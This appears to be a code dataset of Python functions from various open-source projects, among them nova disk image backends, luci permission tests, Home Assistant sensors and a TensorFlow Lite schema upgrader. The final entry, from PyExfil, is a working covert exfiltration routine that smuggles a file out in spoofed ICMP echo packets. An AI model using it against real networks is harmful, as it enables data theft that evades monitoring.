function
stringlengths
11
56k
repo_name
stringlengths
5
60
features
list
def _supports_encryption(self): # NOTE(dgenin): Kernel, ramdisk and disk.config are fetched using # the Raw backend regardless of which backend is configured for # ephemeral storage. Encryption for the Raw backend is not yet # implemented so this loophole is necessary to allow other # backends already supporting encryption to function. This can # be removed once encryption for Raw is implemented. if self.disk_name not in ['kernel', 'ramdisk', 'disk.config']: return False else: return True
cernops/nova
[ 5, 2, 5, 2, 1418819480 ]
def create_image(self, prepare_template, base, size, *args, **kwargs): filename = self._get_lock_name(base) @utils.synchronized(filename, external=True, lock_path=self.lock_path) def copy_raw_image(base, target, size): libvirt_utils.copy_image(base, target) if size: # class Raw is misnamed, format may not be 'raw' in all cases image = imgmodel.LocalFileImage(target, self.driver_format) disk.extend(image, size) generating = 'image_id' not in kwargs if generating: if not self.check_image_exists(): # Generating image in place prepare_template(target=self.path, *args, **kwargs) else: if not os.path.exists(base): prepare_template(target=base, max_size=size, *args, **kwargs) # NOTE(mikal): Update the mtime of the base file so the image # cache manager knows it is in use. libvirt_utils.update_mtime(base) self.verify_base_size(base, size) if not os.path.exists(self.path): with fileutils.remove_path_on_error(self.path): copy_raw_image(base, self.path, size) self.correct_format()
cernops/nova
[ 5, 2, 5, 2, 1418819480 ]
def snapshot_extract(self, target, out_format): images.convert_image(self.path, target, self.driver_format, out_format)
cernops/nova
[ 5, 2, 5, 2, 1418819480 ]
def is_file_in_instance_path(): return True
cernops/nova
[ 5, 2, 5, 2, 1418819480 ]
def __init__(self, instance=None, disk_name=None, path=None): super(Qcow2, self).__init__("file", "qcow2", is_block_dev=False) self.path = (path or os.path.join(libvirt_utils.get_instance_path(instance), disk_name)) self.preallocate = ( strutils.to_slug(CONF.preallocate_images) == 'space') if self.preallocate: self.driver_io = "native" self.disk_info_path = os.path.join(os.path.dirname(self.path), 'disk.info') self.resolve_driver_format()
cernops/nova
[ 5, 2, 5, 2, 1418819480 ]
def copy_qcow2_image(base, target, size): # TODO(pbrady): Consider copying the cow image here # with preallocation=metadata set for performance reasons. # This would be keyed on a 'preallocate_images' setting. libvirt_utils.create_cow_image(base, target) if size: image = imgmodel.LocalFileImage(target, imgmodel.FORMAT_QCOW2) disk.extend(image, size)
cernops/nova
[ 5, 2, 5, 2, 1418819480 ]
def resize_image(self, size): image = imgmodel.LocalFileImage(self.path, imgmodel.FORMAT_QCOW2) disk.extend(image, size)
cernops/nova
[ 5, 2, 5, 2, 1418819480 ]
def is_file_in_instance_path(): return True
cernops/nova
[ 5, 2, 5, 2, 1418819480 ]
def escape(filename): return filename.replace('_', '__')
cernops/nova
[ 5, 2, 5, 2, 1418819480 ]
def _supports_encryption(self): return True
cernops/nova
[ 5, 2, 5, 2, 1418819480 ]
def create_image(self, prepare_template, base, size, *args, **kwargs): def encrypt_lvm_image(): dmcrypt.create_volume(self.path.rpartition('/')[2], self.lv_path, CONF.ephemeral_storage_encryption.cipher, CONF.ephemeral_storage_encryption.key_size, key) filename = self._get_lock_name(base) @utils.synchronized(filename, external=True, lock_path=self.lock_path) def create_lvm_image(base, size): base_size = disk.get_disk_size(base) self.verify_base_size(base, size, base_size=base_size) resize = size > base_size size = size if resize else base_size lvm.create_volume(self.vg, self.lv, size, sparse=self.sparse) if self.ephemeral_key_uuid is not None: encrypt_lvm_image() # NOTE: by calling convert_image_unsafe here we're # telling qemu-img convert to do format detection on the input, # because we don't know what the format is. For example, # we might have downloaded a qcow2 image, or created an # ephemeral filesystem locally, we just don't know here. Having # audited this, all current sources have been sanity checked, # either because they're locally generated, or because they have # come from images.fetch_to_raw. However, this is major code smell. images.convert_image_unsafe(base, self.path, self.driver_format, run_as_root=True) if resize: disk.resize2fs(self.path, run_as_root=True) generated = 'ephemeral_size' in kwargs if self.ephemeral_key_uuid is not None: if 'context' in kwargs: try: # NOTE(dgenin): Key manager corresponding to the # specific backend catches and reraises an # an exception if key retrieval fails. key = self.key_manager.get_key(kwargs['context'], self.ephemeral_key_uuid).get_encoded() except Exception: with excutils.save_and_reraise_exception(): LOG.error(_LE("Failed to retrieve ephemeral encryption" " key")) else: raise exception.NovaException( _("Instance disk to be encrypted but no context provided")) # Generate images with specified size right on volume if generated and size: lvm.create_volume(self.vg, self.lv, size, sparse=self.sparse) with self.remove_volume_on_error(self.path): if self.ephemeral_key_uuid is not None: encrypt_lvm_image() prepare_template(target=self.path, *args, **kwargs) else: if not os.path.exists(base): prepare_template(target=base, max_size=size, *args, **kwargs) with self.remove_volume_on_error(self.path): create_lvm_image(base, size)
cernops/nova
[ 5, 2, 5, 2, 1418819480 ]
def resize_image(self, size): pass
cernops/nova
[ 5, 2, 5, 2, 1418819480 ]
def remove_volume_on_error(self, path): try: yield except Exception: with excutils.save_and_reraise_exception(): if self.ephemeral_key_uuid is None: lvm.remove_volumes([path]) else: dmcrypt.delete_volume(path.rpartition('/')[2]) lvm.remove_volumes([self.lv_path])
cernops/nova
[ 5, 2, 5, 2, 1418819480 ]
def get_model(self, connection): return imgmodel.LocalBlockImage(self.path)
cernops/nova
[ 5, 2, 5, 2, 1418819480 ]
def __init__(self, instance=None, disk_name=None, path=None, **kwargs): super(Rbd, self).__init__("block", "rbd", is_block_dev=False) if path: try: self.rbd_name = path.split('/')[1] except IndexError: raise exception.InvalidDevicePath(path=path) else: self.rbd_name = '%s_%s' % (instance.uuid, disk_name) if not CONF.libvirt.images_rbd_pool: raise RuntimeError(_('You should specify' ' images_rbd_pool' ' flag to use rbd images.')) self.pool = CONF.libvirt.images_rbd_pool self.discard_mode = CONF.libvirt.hw_disk_discard self.rbd_user = CONF.libvirt.rbd_user self.ceph_conf = CONF.libvirt.images_rbd_ceph_conf self.driver = rbd_utils.RBDDriver( pool=self.pool, ceph_conf=self.ceph_conf, rbd_user=self.rbd_user) self.path = 'rbd:%s/%s' % (self.pool, self.rbd_name) if self.rbd_user: self.path += ':id=' + self.rbd_user if self.ceph_conf: self.path += ':conf=' + self.ceph_conf
cernops/nova
[ 5, 2, 5, 2, 1418819480 ]
def _can_fallocate(self): return False
cernops/nova
[ 5, 2, 5, 2, 1418819480 ]
def get_disk_size(self, name): """Returns the size of the virtual disk in bytes. The name argument is ignored since this backend already knows its name, and callers may pass a non-existent local file path. """ return self.driver.size(self.rbd_name)
cernops/nova
[ 5, 2, 5, 2, 1418819480 ]
def resize_image(self, size): self.driver.resize(self.rbd_name, size)
cernops/nova
[ 5, 2, 5, 2, 1418819480 ]
def is_shared_block_storage(): return True
cernops/nova
[ 5, 2, 5, 2, 1418819480 ]
def get_model(self, connection): secret = None if CONF.libvirt.rbd_secret_uuid: secretobj = connection.secretLookupByUUIDString( CONF.libvirt.rbd_secret_uuid) secret = base64.b64encode(secretobj.value()) hosts, ports = self.driver.get_mon_addrs() servers = [str(':'.join(k)) for k in zip(hosts, ports)] return imgmodel.RBDImage(self.rbd_name, self.pool, self.rbd_user, secret, servers)
cernops/nova
[ 5, 2, 5, 2, 1418819480 ]
def create_snap(self, name): return self.driver.create_snap(self.rbd_name, name)
cernops/nova
[ 5, 2, 5, 2, 1418819480 ]
def rollback_to_snap(self, name): return self.driver.rollback_to_snap(self.rbd_name, name)
cernops/nova
[ 5, 2, 5, 2, 1418819480 ]
def direct_snapshot(self, context, snapshot_name, image_format, image_id, base_image_id): """Creates an RBD snapshot directly. """ fsid = self.driver.get_fsid() # NOTE(nic): Nova has zero comprehension of how Glance's image store # is configured, but we can infer what storage pool Glance is using # by looking at the parent image. If using authx, write access should # be enabled on that pool for the Nova user parent_pool = self._get_parent_pool(context, base_image_id, fsid) # Snapshot the disk and clone it into Glance's storage pool. librbd # requires that snapshots be set to "protected" in order to clone them self.driver.create_snap(self.rbd_name, snapshot_name, protect=True) location = {'url': 'rbd://%(fsid)s/%(pool)s/%(image)s/%(snap)s' % dict(fsid=fsid, pool=self.pool, image=self.rbd_name, snap=snapshot_name)} try: self.driver.clone(location, image_id, dest_pool=parent_pool) # Flatten the image, which detaches it from the source snapshot self.driver.flatten(image_id, pool=parent_pool) finally: # all done with the source snapshot, clean it up self.cleanup_direct_snapshot(location) # Glance makes a protected snapshot called 'snap' on uploaded # images and hands it out, so we'll do that too. The name of # the snapshot doesn't really matter, this just uses what the # glance-store rbd backend sets (which is not configurable). self.driver.create_snap(image_id, 'snap', pool=parent_pool, protect=True) return ('rbd://%(fsid)s/%(pool)s/%(image)s/snap' % dict(fsid=fsid, pool=parent_pool, image=image_id))
cernops/nova
[ 5, 2, 5, 2, 1418819480 ]
def __init__(self, instance=None, disk_name=None, path=None): super(Ploop, self).__init__("file", "ploop", is_block_dev=False) self.path = (path or os.path.join(libvirt_utils.get_instance_path(instance), disk_name)) self.resolve_driver_format()
cernops/nova
[ 5, 2, 5, 2, 1418819480 ]
def create_ploop_image(base, target, size): image_path = os.path.join(target, "root.hds") libvirt_utils.copy_image(base, image_path) utils.execute('ploop', 'restore-descriptor', '-f', self.pcs_format, target, image_path) if size: dd_path = os.path.join(self.path, "DiskDescriptor.xml") utils.execute('ploop', 'grow', '-s', '%dK' % (size >> 10), dd_path, run_as_root=True)
cernops/nova
[ 5, 2, 5, 2, 1418819480 ]
def resize_image(self, size): dd_path = os.path.join(self.path, "DiskDescriptor.xml") utils.execute('ploop', 'grow', '-s', '%dK' % (size >> 10), dd_path, run_as_root=True)
cernops/nova
[ 5, 2, 5, 2, 1418819480 ]
def __init__(self, use_cow): self.BACKEND = { 'raw': Raw, 'qcow2': Qcow2, 'lvm': Lvm, 'rbd': Rbd, 'ploop': Ploop, 'default': Qcow2 if use_cow else Raw }
cernops/nova
[ 5, 2, 5, 2, 1418819480 ]
def image(self, instance, disk_name, image_type=None): """Constructs image for selected backend :instance: Instance name. :name: Image name. :image_type: Image type. Optional, is CONF.libvirt.images_type by default. """ backend = self.backend(image_type) return backend(instance=instance, disk_name=disk_name)
cernops/nova
[ 5, 2, 5, 2, 1418819480 ]
def setUp(self): super(BuilderTest, self).setUp() self.builder = permissions.Builder('rev') self.permission = self.builder.permission self.include = self.builder.include self.role = self.builder.role
luci/luci-py
[ 70, 40, 70, 82, 1427740754 ]
def test_empty(self): self.check([], {})
luci/luci-py
[ 70, 40, 70, 82, 1427740754 ]
def test_bad_permission_name(self): with self.assertRaises(ValueError): self.permission('luci.dev') with self.assertRaises(ValueError): self.permission('luci.dev.something.something')
luci/luci-py
[ 70, 40, 70, 82, 1427740754 ]
def test_complex_role(self): self.role('role/dev.a', [ self.permission('luci.dev.p1'), self.permission('luci.dev.p2'), ]) self.role('role/dev.b', [ self.permission('luci.dev.p2'), self.permission('luci.dev.p3'), self.include('role/dev.a'), ]) self.check( perms=['luci.dev.p1', 'luci.dev.p2', 'luci.dev.p3'], roles={ 'role/dev.a': ('luci.dev.p1', 'luci.dev.p2'), 'role/dev.b': ('luci.dev.p1', 'luci.dev.p2', 'luci.dev.p3'), })
luci/luci-py
[ 70, 40, 70, 82, 1427740754 ]
def test_bad_role_name(self): with self.assertRaises(ValueError): self.role('zzz/role', [])
luci/luci-py
[ 70, 40, 70, 82, 1427740754 ]
def test_non_idempotent_perm(self): self.permission('luci.dev.p1') self.permission('luci.dev.p1') with self.assertRaises(ValueError): self.permission('luci.dev.p1', internal=True)
luci/luci-py
[ 70, 40, 70, 82, 1427740754 ]
def test_can_be_built(self): db = permissions.db() for b in db.implicit_root_bindings('proj'): self.assertIsInstance(b, realms_config_pb2.Binding)
luci/luci-py
[ 70, 40, 70, 82, 1427740754 ]
def __init__(self): self.result = set() super(OptimizableComprehension, self).__init__(Identifiers)
serge-sans-paille/pythran
[ 1865, 184, 1865, 122, 1338278534 ]
def visit_ListComp(self, node): if (self.check_comprehension(node.generators)): self.result.add(node)
serge-sans-paille/pythran
[ 1865, 184, 1865, 122, 1338278534 ]
def cmake_args(self): args = [] spec = self.spec args.append(self.define_from_variant('ENABLE_SHARED', 'shared')) args.append(self.define_from_variant('USE_OPENMP', 'openmp')) args.append(self.define_from_variant('USE_READLINE', 'readline')) args.append(self.define_from_variant('USE_HDF5', 'hdf5')) args.append(self.define_from_variant('USE_ADIOS2', 'adios2')) args.append(self.define_from_variant('USE_MPI', 'adios2')) if spec.satisfies('+adios2'): args.append(self.define('ENABLE_TABLELOCKING', False)) # fftw3 is required by casacore starting with v3.4.0, but the # old fftpack is still available. For v3.4.0 and later, we # always require FFTW3 dependency with the optional addition # of FFTPack. In older casacore versions, only one of FFTW3 or # FFTPack can be selected. if spec.satisfies('@3.4.0:'): if spec.satisfies('+fftpack'): args.append('-DBUILD_FFTPACK_DEPRECATED=YES') args.append(self.define('USE_FFTW3', True)) else: args.append(self.define('USE_FFTW3', spec.satisfies('~fftpack'))) # Python2 and Python3 binding if spec.satisfies('~python'): args.extend(['-DBUILD_PYTHON=NO', '-DBUILD_PYTHON3=NO']) elif spec.satisfies('^python@3.0.0:'): args.extend(['-DBUILD_PYTHON=NO', '-DBUILD_PYTHON3=YES']) else: args.extend(['-DBUILD_PYTHON=YES', '-DBUILD_PYTHON3=NO']) args.append('-DBUILD_TESTING=OFF') return args
LLNL/spack
[ 3244, 1839, 3244, 2847, 1389172932 ]
def round_state(func): """Round state.""" def _decorator(self): res = func(self) if isinstance(res, float): return round(res) return res return _decorator
pschmitt/home-assistant
[ 1, 1, 1, 6, 1485261624 ]
def __init__(self, coordinator, name, unique_id): """Initialize.""" self.coordinator = coordinator self._name = name self._unique_id = unique_id self._icon = "mdi:blur"
pschmitt/home-assistant
[ 1, 1, 1, 6, 1485261624 ]
def name(self): """Return the name.""" return self._name
pschmitt/home-assistant
[ 1, 1, 1, 6, 1485261624 ]
def should_poll(self): """Return the polling requirement of the entity.""" return False
pschmitt/home-assistant
[ 1, 1, 1, 6, 1485261624 ]
def icon(self): """Return the icon.""" return self._icon
pschmitt/home-assistant
[ 1, 1, 1, 6, 1485261624 ]
def air_quality_index(self): """Return the air quality index.""" return self.coordinator.data[ATTR_API_CAQI]
pschmitt/home-assistant
[ 1, 1, 1, 6, 1485261624 ]
def particulate_matter_2_5(self): """Return the particulate matter 2.5 level.""" return self.coordinator.data[ATTR_API_PM25]
pschmitt/home-assistant
[ 1, 1, 1, 6, 1485261624 ]
def particulate_matter_10(self): """Return the particulate matter 10 level.""" return self.coordinator.data[ATTR_API_PM10]
pschmitt/home-assistant
[ 1, 1, 1, 6, 1485261624 ]
def attribution(self): """Return the attribution.""" return ATTRIBUTION
pschmitt/home-assistant
[ 1, 1, 1, 6, 1485261624 ]
def unique_id(self): """Return a unique_id for this entity.""" return self._unique_id
pschmitt/home-assistant
[ 1, 1, 1, 6, 1485261624 ]
def available(self): """Return True if entity is available.""" return self.coordinator.last_update_success
pschmitt/home-assistant
[ 1, 1, 1, 6, 1485261624 ]
def device_state_attributes(self): """Return the state attributes.""" return { LABEL_AQI_DESCRIPTION: self.coordinator.data[ATTR_API_CAQI_DESCRIPTION], LABEL_ADVICE: self.coordinator.data[ATTR_API_ADVICE], LABEL_AQI_LEVEL: self.coordinator.data[ATTR_API_CAQI_LEVEL], LABEL_PM_2_5_LIMIT: self.coordinator.data[ATTR_API_PM25_LIMIT], LABEL_PM_2_5_PERCENT: round(self.coordinator.data[ATTR_API_PM25_PERCENT]), LABEL_PM_10_LIMIT: self.coordinator.data[ATTR_API_PM10_LIMIT], LABEL_PM_10_PERCENT: round(self.coordinator.data[ATTR_API_PM10_PERCENT]), }
pschmitt/home-assistant
[ 1, 1, 1, 6, 1485261624 ]
def context_managers(self, kwargs): mode = kwargs.pop("mode", None) if mode is None: return [] elif mode == "eager": return [context.eager_mode()] elif mode == "graph": return [ops.Graph().as_default(), context.graph_mode()] else: raise ValueError( "Argument 'mode' must be either 'eager' or 'graph'. " f"Received: {mode}.")
tensorflow/tensorflow
[ 171949, 87931, 171949, 2300, 1446859160 ]
def should_execute_combination(self, kwargs): tf_api_version = kwargs.pop("tf_api_version", None) if tf_api_version == 1 and tf2.enabled(): return (False, "Skipping a TF1.x test when TF2 is enabled.") elif tf_api_version == 2 and not tf2.enabled(): return (False, "Skipping a TF2 test when TF2 is not enabled.") return (True, None)
tensorflow/tensorflow
[ 171949, 87931, 171949, 2300, 1446859160 ]
def TemporaryDirectoryResource(): temporary = tempfile.mkdtemp() try: yield temporary finally: shutil.rmtree(temporary)
tensorflow/tensorflow
[ 171949, 87931, 171949, 2300, 1446859160 ]
def __init__(self): # TODO(aselle): make this work in the open source version with better # path. paths_to_try = [ "../../../../flatbuffers/flatc", # not bazel "../../../../external/flatbuffers/flatc" # bazel ] for p in paths_to_try: self._flatc_path = resource_loader.get_path_to_datafile(p) if os.path.exists(self._flatc_path): break def FindSchema(base_name): return resource_loader.get_path_to_datafile("%s" % base_name) # Supported schemas for upgrade. self._schemas = [ (0, FindSchema("schema_v0.fbs"), True, self._Upgrade0To1), (1, FindSchema("schema_v1.fbs"), True, self._Upgrade1To2), (2, FindSchema("schema_v2.fbs"), True, self._Upgrade2To3), (3, FindSchema("schema_v3.fbs"), False, None) # Non-callable by design. ] # Ensure schemas are sorted, and extract latest version and upgrade # dispatch function table. self._schemas.sort() self._new_version, self._new_schema = self._schemas[-1][:2] self._upgrade_dispatch = { version: dispatch for version, unused1, unused2, dispatch in self._schemas}
tensorflow/tensorflow
[ 171949, 87931, 171949, 2300, 1446859160 ]
def _Write(self, data, output_file): """Output a json or bin version of the flatbuffer model. Args: data: Dict representing the TensorFlow Lite model to write. output_file: filename to write the converted flatbuffer to. (json, tflite, or bin extension is required). Raises: ValueError: When the extension is not json or bin RuntimeError: When flatc fails to convert json data to binary. """ _, extension = os.path.splitext(output_file) with TemporaryDirectoryResource() as tempdir: if extension == ".json": json.dump(data, open(output_file, "w"), sort_keys=True, indent=2) elif extension in [".tflite", ".bin"]: input_json = os.path.join(tempdir, "temp.json") with open(input_json, "w") as fp: json.dump(data, fp, sort_keys=True, indent=2) returncode = subprocess.call([ self._flatc_path, "-b", "--defaults-json", "--strict-json", "-o", tempdir, self._new_schema, input_json ]) if returncode != 0: raise RuntimeError("flatc failed to convert upgraded json to binary.") shutil.copy(os.path.join(tempdir, "temp.tflite"), output_file) else: raise ValueError("Invalid extension on output file %r" % output_file)
tensorflow/tensorflow
[ 171949, 87931, 171949, 2300, 1446859160 ]
def _Upgrade1To2(self, data): """Upgrade data from Version 1 to Version 2. Changes: Rename operators to Conform to NN API. Args: data: Dictionary representing the TensorFlow lite data to be upgraded. This will be modified in-place to be an upgraded version. Raises: ValueError: Throws when model builtins are numeric rather than symbols. """ def RemapOperator(opcode_name): """Go from old schema op name to new schema op name. Args: opcode_name: String representing the ops (see :schema.fbs). Returns: Converted opcode_name from V1 to V2. """ old_name_to_new_name = { "CONVOLUTION": "CONV_2D", "DEPTHWISE_CONVOLUTION": "DEPTHWISE_CONV_2D", "AVERAGE_POOL": "AVERAGE_POOL_2D", "MAX_POOL": "MAX_POOL_2D", "L2_POOL": "L2_POOL_2D", "SIGMOID": "LOGISTIC", "L2NORM": "L2_NORMALIZATION", "LOCAL_RESPONSE_NORM": "LOCAL_RESPONSE_NORMALIZATION", "Basic_RNN": "RNN", } return (old_name_to_new_name[opcode_name] if opcode_name in old_name_to_new_name else opcode_name) def RemapOperatorType(operator_type): """Remap operator structs from old names to new names. Args: operator_type: String representing the builtin operator data type string. (see :schema.fbs). Raises: ValueError: When the model has consistency problems. Returns: Upgraded builtin operator data type as a string. """ old_to_new = { "PoolOptions": "Pool2DOptions", "DepthwiseConvolutionOptions": "DepthwiseConv2DOptions", "ConvolutionOptions": "Conv2DOptions", "LocalResponseNormOptions": "LocalResponseNormalizationOptions", "BasicRNNOptions": "RNNOptions", } return (old_to_new[operator_type] if operator_type in old_to_new else operator_type) for subgraph in data["subgraphs"]: for ops in subgraph["operators"]: ops["builtin_options_type"] = RemapOperatorType( ops["builtin_options_type"]) # Upgrade the operator codes for operator_code in data["operator_codes"]: # Check if builtin_code is the appropriate string type # use type("") instead of str or unicode. for py2and3 if not isinstance(operator_code["builtin_code"], type(u"")): raise ValueError("builtin_code %r is non-string. this usually means " "your model has consistency problems." % (operator_code["builtin_code"])) operator_code["builtin_code"] = (RemapOperator( operator_code["builtin_code"]))
tensorflow/tensorflow
[ 171949, 87931, 171949, 2300, 1446859160 ]
def _PerformUpgrade(self, data): """Manipulate the `data` (parsed JSON) based on changes in format. This incrementally will upgrade from version to version within data. Args: data: Dictionary representing the TensorFlow data. This will be upgraded in place. """ while data["version"] < self._new_version: self._upgrade_dispatch[data["version"]](data) data["version"] += 1
tensorflow/tensorflow
[ 171949, 87931, 171949, 2300, 1446859160 ]
def main(argv): del argv Converter().Convert(FLAGS.input, FLAGS.output)
tensorflow/tensorflow
[ 171949, 87931, 171949, 2300, 1446859160 ]
def __init__(self, hass, config_entry): """Initialize global Met data updater.""" self._unsub_track_home = None self.weather = MetWeatherData( hass, config_entry.data, hass.config.units.is_metric ) self.weather.init_data() update_interval = timedelta(minutes=randrange(55, 65)) super().__init__(hass, _LOGGER, name=DOMAIN, update_interval=update_interval)
tchellomello/home-assistant
[ 7, 1, 7, 6, 1467778429 ]
def track_home(self): """Start tracking changes to HA home setting.""" if self._unsub_track_home: return async def _async_update_weather_data(_event=None): """Update weather data.""" self.weather.init_data() await self.async_refresh() self._unsub_track_home = self.hass.bus.async_listen( EVENT_CORE_CONFIG_UPDATE, _async_update_weather_data )
tchellomello/home-assistant
[ 7, 1, 7, 6, 1467778429 ]
def __init__(self, hass, config, is_metric): """Initialise the weather entity data.""" self.hass = hass self._config = config self._is_metric = is_metric self._weather_data = None self.current_weather_data = {} self.daily_forecast = None self.hourly_forecast = None
tchellomello/home-assistant
[ 7, 1, 7, 6, 1467778429 ]
def forwards(self, orm):
awemulya/fieldsight-kobocat
[ 45, 7, 45, 26, 1481100851 ]
def backwards(self, orm):
awemulya/fieldsight-kobocat
[ 45, 7, 45, 26, 1481100851 ]
def _int64_feature(value): return tf.train.Feature(int64_list=tf.train.Int64List(value=[value]))
unnikrishnankgs/va
[ 1, 5, 1, 10, 1496432585 ]
def main(): """Main converter function.""" # Celeb A with open(FLAGS.partition_fn, "r") as infile: img_fn_list = infile.readlines() img_fn_list = [elem.strip().split() for elem in img_fn_list] img_fn_list = [elem[0] for elem in img_fn_list if elem[1] == FLAGS.set] fn_root = FLAGS.fn_root num_examples = len(img_fn_list) file_out = "%s.tfrecords" % FLAGS.file_out writer = tf.python_io.TFRecordWriter(file_out) for example_idx, img_fn in enumerate(img_fn_list): if example_idx % 1000 == 0: print example_idx, "/", num_examples image_raw = scipy.ndimage.imread(os.path.join(fn_root, img_fn)) rows = image_raw.shape[0] cols = image_raw.shape[1] depth = image_raw.shape[2] image_raw = image_raw.tostring() example = tf.train.Example( features=tf.train.Features( feature={ "height": _int64_feature(rows), "width": _int64_feature(cols), "depth": _int64_feature(depth), "image_raw": _bytes_feature(image_raw) } ) ) writer.write(example.SerializeToString()) writer.close()
unnikrishnankgs/va
[ 1, 5, 1, 10, 1496432585 ]
def __init__(self, code, **exception_kwargs): self.code = code # represents all identifiers which are assigned to at some point in # the code self.declared_identifiers = set() # represents all identifiers which are referenced before their # assignment, if any self.undeclared_identifiers = set() # note that an identifier can be in both the undeclared and declared # lists. # using AST to parse instead of using code.co_varnames, # code.co_names has several advantages: # - we can locate an identifier as "undeclared" even if # its declared later in the same block of code # - AST is less likely to break with version changes # (for example, the behavior of co_names changed a little bit # in python version 2.5) if isinstance(code, compat.string_types): expr = pyparser.parse(code.lstrip(), "exec", **exception_kwargs) else: expr = code f = pyparser.FindIdentifiers(self, **exception_kwargs) f.visit(expr)
nwjs/chromium.src
[ 136, 133, 136, 45, 1453904223 ]
def __init__(self, code, **exception_kwargs): self.codeargs = [] self.args = [] self.declared_identifiers = set() self.undeclared_identifiers = set() if isinstance(code, compat.string_types): if re.match(r"\S", code) and not re.match(r",\s*$", code): # if theres text and no trailing comma, insure its parsed # as a tuple by adding a trailing comma code += "," expr = pyparser.parse(code, "exec", **exception_kwargs) else: expr = code f = pyparser.FindTuple(self, PythonCode, **exception_kwargs) f.visit(expr)
nwjs/chromium.src
[ 136, 133, 136, 45, 1453904223 ]
def __init__(self, code, **exception_kwargs): m = re.match(r"^(\w+)(?:\s+(.*?))?:\s*(#|$)", code.strip(), re.S) if not m: raise exceptions.CompileException( "Fragment '%s' is not a partial control statement" % code, **exception_kwargs ) if m.group(3): code = code[: m.start(3)] (keyword, expr) = m.group(1, 2) if keyword in ["for", "if", "while"]: code = code + "pass" elif keyword == "try": code = code + "pass\nexcept:pass" elif keyword == "elif" or keyword == "else": code = "if False:pass\n" + code + "pass" elif keyword == "except": code = "try:pass\n" + code + "pass" elif keyword == "with": code = code + "pass" else: raise exceptions.CompileException( "Unsupported control keyword: '%s'" % keyword, **exception_kwargs ) super(PythonFragment, self).__init__(code, **exception_kwargs)
nwjs/chromium.src
[ 136, 133, 136, 45, 1453904223 ]
def __init__(self, code, allow_kwargs=True, **exception_kwargs): self.code = code expr = pyparser.parse(code, "exec", **exception_kwargs) f = pyparser.ParseFunc(self, **exception_kwargs) f.visit(expr) if not hasattr(self, "funcname"): raise exceptions.CompileException( "Code '%s' is not a function declaration" % code, **exception_kwargs ) if not allow_kwargs and self.kwargs: raise exceptions.CompileException( "'**%s' keyword argument not allowed here" % self.kwargnames[-1], **exception_kwargs )
nwjs/chromium.src
[ 136, 133, 136, 45, 1453904223 ]
def allargnames(self): return tuple(self.argnames) + tuple(self.kwargnames)
nwjs/chromium.src
[ 136, 133, 136, 45, 1453904223 ]
def setup(self): """setup the test """ pass
eoyilmaz/anima
[ 119, 27, 119, 3, 1392807749 ]
def test_arnold_b85_encode_packs_zeros_properly(self): """testing if arnold_b85_encode is packing zeros properly """ raw_data = [ struct.pack('f', 0.0), struct.pack('ffff', 0.0, 0.0, 3.484236717224121, 0.0) ] encoded_data = [ 'z', 'zz8^RH(z' ] for i in range(len(raw_data)): self.assertEqual( encoded_data[i], base85.arnold_b85_encode(raw_data[i]) )
eoyilmaz/anima
[ 119, 27, 119, 3, 1392807749 ]
def test_arnold_b85_decode_is_working_properly(self): """testing if arnold_b85_decode is working properly """ raw_data = [ struct.pack('f', 2), struct.pack('f', 3.484236717224121), ] encoded_data = [ '8TFfd', '8^RH(', ] for i in range(len(raw_data)): self.assertEqual( raw_data[i], base85.arnold_b85_decode(encoded_data[i]) )
eoyilmaz/anima
[ 119, 27, 119, 3, 1392807749 ]
def test_arnold_b85_decode_unpacks_ones_properly(self): """testing if arnold_b85_decode is unpacking zeros properly """ raw_data = [ struct.pack('f', 1.0), struct.pack('ffff', 1.0, 1.0, 3.484236717224121, 1.0) ] encoded_data = [ 'y', 'yy8^RH(y' ] for i in range(len(raw_data)): self.assertEqual( raw_data[i], base85.arnold_b85_decode(encoded_data[i]) )
eoyilmaz/anima
[ 119, 27, 119, 3, 1392807749 ]
def send_file(ip_addr, src_ip_addr="127.0.0.1", file_path="", max_packetsize=512, SLEEP=0.1): """ send_file will send a file to the ip_addr given. A file path is required to send the file. Max packet size can be determined automatically. :param ip_addr: IP Address to send the file to. :param src_ip_addr: IP Address to spoof from. Default it 127.0.0.1. :param file_path: Path of the file to send. :param max_packetsize: Max packet size. Default is 512. :return: """ if file_path == "": sys.stderr.write("No file path given.\n") return -1 # Load file fh = open(file_path, READ_BINARY) iAmFile = fh.read() fh.close() # Create Raw Socket s = socket(AF_INET, SOCK_RAW, IPPROTO_ICMP) s.setsockopt(IPPROTO_IP, IP_HDRINCL, 1) # Create IP Packet ip = ImpactPacket.IP() ip.set_ip_src(src_ip_addr) ip.set_ip_dst(ip_addr) # ICMP on top of IP icmp = ImpactPacket.ICMP() icmp.set_icmp_type(icmp.ICMP_ECHO) seq_id = 0 # Calculate File: IamDone = base64.b64encode(iAmFile) # Base64 Encode for ASCII checksum = zlib.crc32(IamDone) # Build CRC for the file # Fragmentation of DATA x = len(IamDone) / max_packetsize y = len(IamDone) % max_packetsize # Get file name from file path: head, tail = os.path.split(file_path) # Build stream initiation packet current_packet = "" current_packet += tail + DATA_SEPARATOR + str(checksum) + DATA_SEPARATOR + str(x + 2) + DATA_TERMINATOR + INIT_PACKET icmp.contains(ImpactPacket.Data(current_packet)) ip.contains(icmp) icmp.set_icmp_id(seq_id) icmp.set_icmp_cksum(0) icmp.auto_checksum = 1 s.sendto(ip.get_packet(), (ip_addr, 0)) time.sleep(SLEEP) seq_id += 1 # Iterate over the file for i in range(1, x + 2): str_send = IamDone[max_packetsize * (i - 1): max_packetsize * i] + DATA_TERMINATOR icmp.contains(ImpactPacket.Data(str_send)) ip.contains(icmp) icmp.set_icmp_id(seq_id) icmp.set_icmp_cksum(0) icmp.auto_checksum = 1 s.sendto(ip.get_packet(), (ip_addr, 0)) time.sleep(SLEEP) seq_id += 1 # Add last section str_send = IamDone[max_packetsize * i:max_packetsize * i + y] + DATA_TERMINATOR icmp.contains(ImpactPacket.Data(str_send)) ip.contains(icmp) seq_id += 1 icmp.set_icmp_id(seq_id) icmp.set_icmp_cksum(0) icmp.auto_checksum = 1 s.sendto(ip.get_packet(), (ip_addr, 0)) time.sleep(SLEEP) # Send termination package str_send = (tail + DATA_SEPARATOR + str(checksum) + DATA_SEPARATOR + str(seq_id) + DATA_TERMINATOR + END_PACKET) icmp.contains(ImpactPacket.Data(str_send)) ip.contains(icmp) seq_id += 1 icmp.set_icmp_id(seq_id) icmp.set_icmp_cksum(0) icmp.auto_checksum = 1 s.sendto(ip.get_packet(), (ip_addr, 0)) return 0
ytisf/PyExfil
[ 668, 140, 668, 1, 1417115184 ]
